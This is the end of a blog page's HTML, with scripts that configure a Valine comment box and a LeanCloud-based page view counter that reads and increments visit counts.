    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item=>{
      return GUEST.indexOf(item)>-1;
    });
    new Valine({
        el: '#comments' ,
        verify: false,
        notify: false,
        appId: '9XbHd3aRgM0agCnx02acXyx3-gzGzoHsz',
        appKey: 'PWvOeMRxEmYLm00qEd4YDfIW',
        placeholder: 'Just go go',
        avatar:'mm',
        guest_info:guest,
        pageSize:'10' || 10,
    });
  </script>



  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("9XbHd3aRgM0agCnx02acXyx3-gzGzoHsz", "PWvOeMRxEmYLm00qEd4YDfIW");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  
  

  

  

  

</body>
</html>
